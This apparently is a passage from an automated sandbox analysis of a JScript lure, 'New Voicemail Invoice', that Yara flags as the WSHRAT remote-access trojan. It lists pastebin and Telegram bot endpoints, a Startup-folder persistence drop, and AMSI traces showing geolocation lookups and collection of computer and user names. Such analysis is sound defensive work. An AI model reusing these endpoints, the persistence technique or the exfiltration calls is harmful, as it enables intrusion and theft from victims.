Source: wscript.exe, 00000001.00000003.1871507167.0000019396A09000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://pastebin.com/raw/NsQ5qTHrL#
Source: wscript.exe, 00000001.00000002.2937551105.0000019395838000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.1870328410.0000019396FB4000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000002.2937551105.0000019395825000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://api.telegram.org/bot6968126468:AAFBucF0UmhmKMp_RgCJWJVC7hjGAO
Source: wscript.exe, 00000001.00000002.2937551105.0000019395838000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.1870328410.0000019396FB4000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000002.2937551105.0000019395825000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://json.geoiplookup.io/
Source: wscript.exe, 00000001.00000003.1871507167.0000019396A09000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://pastebin.com/raw/NsQ5qTHr
Source: wscript.exe, 00000001.00000003.1871507167.0000019396A09000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://pastebin.com/raw/NsQ5qTHrU#0

Source: unknown	Network traffic detected: HTTP traffic on port 49733 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49733
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49732
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49731
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49730
Source: unknown	Network traffic detected: HTTP traffic on port 49731 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49732 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49730 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49740
Source: unknown	Network traffic detected: HTTP traffic on port 49740 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49749 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49746 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49747 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49749
Source: unknown	Network traffic detected: HTTP traffic on port 49735 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49747
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49735
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49746

Source: unknown	HTTPS traffic detected: 104.21.25.148:443 -> 192.168.2.4:49730 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:49731 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.66.44.176:443 -> 192.168.2.4:49732 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.25.148:443 -> 192.168.2.4:49733 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:49735 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.20.3.235:443 -> 192.168.2.4:49740 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.25.148:443 -> 192.168.2.4:49746 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:49747 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.20.4.235:443 -> 192.168.2.4:49749 version: TLS 1.2

Key, Mouse, Clipboard, Microphone and Screen Capturing

Yara detected WSHRAT

Source: Yara match	File source: dump.pcap, type: PCAP
Source: Yara match	File source: sslproxydump.pcap, type: PCAP
Source: Yara match	File source: 00000001.00000002.2938355431.00000193969C6000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000003.2180517172.0000027242C12000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000003.2255737493.0000027242A3F000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000003.2256293540.0000027242C1E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000003.2180342190.0000027242A3E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.1797163332.00000193950DB000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.2937053189.00000193950D3000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.2938800577.0000019396F69000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000003.2255570115.0000027242752000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000003.2251240073.0000027244ABA000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.1797358254.00000193952B4000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.2937216627.00000193952BE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000003.2255381138.0000027243CE8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.2936761014.0000019394DFC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.2937959613.0000019396384000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: wscript.exe PID: 5660, type: MEMORYSTR
Source: Yara match	File source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\98575.js, type: DROPPED
Source: Yara match	File source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\98575[1].js, type: DROPPED
Source: Yara match	File source: C:\Users\user\AppData\Local\Temp\98575.js, type: DROPPED

System Summary

Sample has a suspicious name (potential lure to open the executable)

Source: New Voicemail Invoice 64746w .js

Static file information: Suspicious name

Windows Scripting host queries suspicious COM object (likely to drop second stage)

Source: C:\Windows\System32\wscript.exe

COM Object queried: XML HTTP HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{F6D90F16-9C73-11D3-B32E-00C04F990BB4}

Jump to behavior

Wscript called in batch mode (surpress errors)

Source: unknown	Process created: C:\Windows\System32\wscript.exe "C:\Windows\system32\wscript.exe" //B "C:\Users\user\AppData\Local\Temp\98575.js"
Source: unknown	Process created: C:\Windows\System32\wscript.exe "C:\Windows\system32\wscript.exe" //B "C:\Users\user\AppData\Local\Temp\98575.js"

Source: New Voicemail Invoice 64746w .js

Initial sample: Strings found which are bigger than 50

Source: classification engine

Classification label: mal100.troj.expl.evad.winJS@6/7@7/7

Source: C:\Windows\System32\wscript.exe

File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\Z3ZFCENO.json

Jump to behavior

Source: C:\Windows\System32\wscript.exe

File created: C:\Users\user\AppData\Local\Temp\98575.js

Jump to behavior

Source: C:\Windows\System32\wscript.exe

File read: C:\Users\user\Desktop\desktop.ini

Jump to behavior

Source: C:\Windows\System32\wscript.exe

Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: New Voicemail Invoice 64746w .js

Virustotal: Detection: 12%

Source: unknown	Process created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\New Voicemail Invoice 64746w .js"
Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\98575.js"
Source: unknown	Process created: C:\Windows\System32\wscript.exe "C:\Windows\system32\wscript.exe" //B "C:\Users\user\AppData\Local\Temp\98575.js"
Source: unknown	Process created: C:\Windows\System32\wscript.exe "C:\Windows\system32\wscript.exe" //B "C:\Users\user\AppData\Local\Temp\98575.js"
Source: unknown	Process created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\98575.js"
Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\98575.js"	Jump to behavior

Source: C:\Windows\System32\wscript.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: sxs.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: jscript.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: scrobj.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: scrrun.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: msxml3.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: mlang.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: winhttpcom.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: webio.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: msdart.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: policymanager.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: msvcp110_win.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: sxs.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: jscript.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: scrobj.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: msxml3.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: mlang.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: scrrun.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: winhttpcom.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: webio.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: msdart.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: napinsp.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: pnrpnsp.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: wshbth.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: nlaapi.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: winrnr.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: sxs.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: jscript.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: version.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: uxtheme.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: sxs.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: jscript.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: iertutil.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: amsi.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: userenv.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: profapi.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: sxs.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: jscript.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: scrobj.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: msxml3.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: mlang.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: scrrun.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: winhttpcom.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: webio.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: msdart.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: textshaping.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: textinputframework.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: coreuicomponents.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: wintypes.dll	Jump to behavior

Source: C:\Windows\System32\wscript.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{f414c260-6ac0-11cf-b6d1-00aa00bbbb58}\InprocServer32

Jump to behavior

Data Obfuscation

JScript performs obfuscated calls to suspicious functions

Source: C:\Windows\System32\wscript.exe	Anti Malware Scan Interface: CreateObject("msxml2.xmlhttp");IHost.Name();IServerXMLHTTPRequest2._00000000();ITextStream.WriteLine(" exit:3920 o:Windows%20Script%20Host f:CreateObject r:");ITextStream.WriteLine(" entry:3948 f:_0x944257 a0:-583 a1:-610 a2:-526 a3:-544");ITextStream.WriteLine(" exec:3895 f:_0x944257");ITextStream.WriteLine(" entry:3902 f:_0x346f50 a0:-583 a1:545 a2:-981 a3:-557");ITextStream.WriteLine(" exit:3902 f:_0x346f50 r:%22open%22");ITextStream.WriteLine(" exit:3948 f:_0x944257 r:%22open%22");ITextStream.WriteLine(" entry:3963 f:_0x205b57 a0:-227 a1:-282 a2:-106 a3:-188");ITextStream.WriteLine(" exec:3875 f:_0x205b57");ITextStream.WriteLine(" entry:3882 f:_0x44b961 a0:-227 a1:-556 a2:-171 a3:-270");ITextStream.WriteLine(" exit:3882 f:_0x44b961 r:%22HdTFs%22");ITextStream.WriteLine(" exit:3963 f:_0x205b57 r:%22HdTFs%22");ITextStream.WriteLine(" entry:3976 f:_0x205b57 a0:-59 a1:-89 a2:-153 a3:-121");ITextStream.WriteLine(" exec:3875 f:_0x205b57");ITextStream.WriteLine(" entry:3882 f:_0x44b961 a0:-59 a1:-363 a2:-218 a3:-203");ITextStream.WriteLine(" exit:3882 f:_0x44b961 r:%22https%3A%2F%2Fjs%22");ITextStream.WriteLine(" exit:3976 f:_0x205b57 r:%22https%3A%2F%2Fjs%22");ITextStream.WriteLine(" entry:3987 f:_0x944257 a0:-590 a1:-621 a2:-629 a3:-607");ITextStream.WriteLine(" exec:3895 f:_0x944257");ITextStream.WriteLine(" entry:3902 f:_0x346f50 a0:-590 a1:534 a2:-1084 a3:-620");ITextStream.WriteLine(" exit:3902 f:_0x346f50 r:%22on.geoiplo%22");ITextStream.WriteLine(" exit:3987 f:_0x944257 r:%22on.geoiplo%22");ITextStream.WriteLine(" entry:3998 f:_0x205b57 a0:-287 a1:-238 a2:-221 a3:-253");ITextStream.WriteLine(" exec:3875 f:_0x205b57");ITextStream.WriteLine(" entry:3882 f:_0x44b961 a0:-287 a1:-512 a2:-286 a3:-335");ITextStream.WriteLine(" exit:3882 f:_0x44b961 r:%22okup.io%2F%22");ITextStream.WriteLine(" exit:3998 f:_0x205b57 r:%22okup.io%2F%22");IServerXMLHTTPRequest2._00000000();ITextStream.WriteLine(" entry:3944 o: f:open a0:%22GET%22 a1:%22https%3A%2F%2Fjson.geoiplookup.io%2F%22 a2:false");IServerXMLHTTPRequest2.open("GET", "https://json.geoiplookup.io/", "false");IServerXMLHTTPRequest2._00000000();ITextStream.WriteLine(" exit:3944 o: f:open r:undefined");ITextStream.WriteLine(" entry:4016 f:_0x205b57 a0:-180 a1:-128 a2:-190 a3:-115");ITextStream.WriteLine(" exec:3875 f:_0x205b57");ITextStream.WriteLine(" entry:3882 f:_0x44b961 a0:-180 a1:-402 a2:-255 a3:-197");ITextStream.WriteLine(" exit:3882 f:_0x44b961 r:%22setRequest%22");ITextStream.WriteLine(" exit:4016 f:_0x205b57 r:%22setRequest%22");ITextStream.WriteLine(" entry:4027 f:_0x205b57 a0:-77 a1:-204 a2:-165 a3:-172");ITextStream.WriteLine(" exit:4027 f:_0x205b57 r:%22Header%22");ITextStream.WriteLine(" entry:4043 f:_0x205b57 a0:-101 a1:-70 a2:-76 a3:-142");ITextStream.WriteLine(" exit:4043 f:_0x205b57 r:%22HEXIh%22");IServerXMLHTTPRequest2._00000000();ITextStream.WriteLine(" entry:4011 o: f:setRequestHeader a0:%22User-Agent%22 a1:%22Mozilla%2F5.0%20(Windows%20NT%2010.0%3B%20Win64%3B%20x64)%20AppleWebKi
Source: C:\Windows\System32\wscript.exe	Anti Malware Scan Interface: CreateObject("msxml2.xmlhttp");IServerXMLHTTPRequest2.open("GET", "https://json.geoiplookup.io/", "false");IServerXMLHTTPRequest2.setRequestHeader("User-Agent", "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/73.0.3683.86 ");IServerXMLHTTPRequest2.send();({ "ip": "8.46.123.175", "isp": "Level 3", "org": "CenturyLink Communications, LLC", "hostname": "static-cpe-8-46-123-175.centurylink.com", "latitude": 40.7128, "longitude": -74.006, "postal_code": "10123", "city": "New York", "country_code": "US", "country_name": "United States", "continent_code": "NA", "continent_name": "North America", "region": "New York", "district": "", "timezone_name": "America\/New_York", "connection_type": "Corporate", "asn_number": 3356, "asn_org": "Level 3 Communications, Inc.", "asn": "AS3356 - Level 3 Communications, Inc.", "currency_code": "USD", "currency_name": "US Dollar", "success": true, "premium": false})IHost.CreateObject("msxml2.xmlhttp");IServerXMLHTTPRequest2.open("GET", "https://json.geoiplookup.io/", "false");IServerXMLHTTPRequest2.setRequestHeader("User-Agent", "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/73.0.3683.86 ");IServerXMLHTTPRequest2.send();IServerXMLHTTPRequest2.status();IServerXMLHTTPRequest2.responseText();IWshShell3.ExpandEnvironmentStrings("%COMPUTERNAME%");IWshShell3.ExpandEnvironmentStrings("%USERNAME%");IHost.CreateObject("msxml2.xmlhttp");IServerXMLHTTPRequest2.open("GET", "https://json.geoiplookup.io/", "false");IServerXMLHTTPRequest2.setRequestHeader("User-Agent", "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/73.0.3683.86 ");IServerXMLHTTPRequest2.send();({ "ip": "8.46.123.175", "isp": "Level 3", "org": "CenturyLink Communications, LLC", "hostname": "static-cpe-8-46-123-175.centurylink.com", "latitude": 40.7128, "longitude": -74.006, "postal_code": "10123", "city": "New York", "country_code": "US", "country_name": "United States", "continent_code": "NA", "continent_name": "North America", "region": "New York", "district": "", "timezone_name": "America\/New_York", "connection_type": "Corporate", "asn_number": 3356, "asn_org": "Level 3 Communications, Inc.", "asn": "AS3356 - Level 3 Communications, 